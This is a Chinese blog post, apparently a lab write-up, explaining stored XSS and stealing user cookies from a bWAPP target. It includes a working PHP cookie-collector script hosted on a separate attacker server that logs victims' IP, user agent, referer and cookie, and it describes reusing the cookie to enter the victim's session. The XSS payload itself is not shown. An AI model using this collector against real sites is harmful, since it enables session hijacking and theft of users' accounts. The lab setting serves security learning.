存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie等。

实验内容：通过存储型xss漏洞获取用户cookie

靶机：192.168.1.104（bwapp）

客户机：192.168.1.103（win7）

存放获取cookie脚本的服务器：192.1681.109（ubuntu）

获取cookie的php文件代码：

 <?php

 $ip = $_SERVER['REMOTE_ADDR'];

 $user_agent = $_SERVER['HTTP_USER_AGENT'];

 $referer = $_SERVER['HTTP_REFERER'];

 $cookie = $_GET['hack'];

 $content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n";

 $file = fopen("data.txt","a");

 fwrite($file,$content);

 fclose($file);

 header("location: http://www.baidu.com");

 ?>

访问靶机系统：http://192.168.1.104/bWAPP/xss_stored_1.php

输入payload

用户192.168.1.103将在访问这个页面的时候向服务器提交cookie

服务器收到请求后会在当前目录创建一个名为data.txt的文件，存放获取到的内容，其文件内容为：

现在我们已经获取到了cookie，接下来可以使用cookie访问用户登录之后才可以访问到的内容

本文固定链接：http://www.cnblogs.com/hell0w/p/7528926.html 转载请注明出处，谢谢！

最新文章

1. 使用VS Code开发ASP.NET 5 应用程序
2. Learn GIT
3. Fix failed to start session in Ubuntu
4. 建立自己的git repository
5. Ngrok远程桌面及ssh配置
6. The Longest Increasing Subsequence (LIS)
7. 安装.NET Framework组件时，电脑意外重启后再次安装失败
8. android手机屏幕分辨率 及 sp dip（dp） px 区别 及高中低分辨率时处理
9. Python | 基础系列 · Python为什么没有switch/case语句？
10. （适合入门）JVM堆内存相关的启动参数：年轻一代、岁和永久代内存分配
11. Yii Framework2.0开发教程（4）在yii中定义全局变量
12. 学习MQ（三） 一个实例
13. 百度API获取经纬度使用
14. 1. ELK 之elasticsearch 简介、获取、安装
15. 浅析USB之设备枚举
16. 2018-2019-2 《网络对抗技术》Exp0 Kali安装 Week1 20165301
17. 菜鸟学步之 爆破AspriseOCR 4.0
18. JavaScript基础函数和词法分析以及常用的内置对象和使用方法（4）
19. [乱搞]hdu 6406 Taotao picks apples 笛卡尔树+倍增
20. 笔记本自开wifi设置

热门文章

1. emWin 学习笔记 —— 用VS2017打开emWin仿真包
2. TableView滑动时候出现的卡顿现象
3. 每天看一片代码系列（二）：WebSocket-Node
4. 在Win10中通过命令行打开UWP应用
5. 微信小程序学习笔记（1）-微信小程序样式设置逻辑
6. 使用redux-actions优化actions管理
7. git 创建新项目，下载工程，合并和更新工程简单应用记录
8. Qt-QML-ComboBox-自定义，实现状态表示，内容可以动态正价，使用ListModel
9. 感觉总结了一切python常见知识点，可直接运行版本
10. 单词 （Play on Words UVA - 10129 ）